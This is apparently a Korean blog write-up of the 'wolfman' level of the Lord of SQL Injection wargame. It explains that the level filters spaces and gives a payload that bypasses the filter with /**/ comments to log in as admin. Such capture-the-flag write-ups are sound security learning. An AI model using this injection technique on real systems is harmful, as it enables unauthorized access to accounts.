티스토리

.
검색하기

[Lord of SQL injection] wolfman

writeup/LOS

[Lord of SQL injection] wolfman

hoppi 2021. 7. 2. 13:54

마흔세 번째 글.

 

 

1. 코드 분석

공백을 필터링하고 있었고 result의 id가 admin이면 문제가 풀리게 된다.

 

 

2. Exploit

공백을 우회하는 방법은 매우 많다.(Reference 참고)

 

?pw=?pw='/**/or/**/id='admin'%23

나는 주석을 이용하였다.

 

 

ㄲ

 

 

Reference

https://posix.tistory.com/42 //공백우회

https://portswigger.net/support/sql-injection-bypassing-common-filters

블로그 정보

.

hi i'm hoppi

프로필 사진
문의안내
  • 티스토리
  • 로그인
  • 고객센터

티스토리는 카카오에서 사랑을 담아 만듭니다.

© Kakao Corp.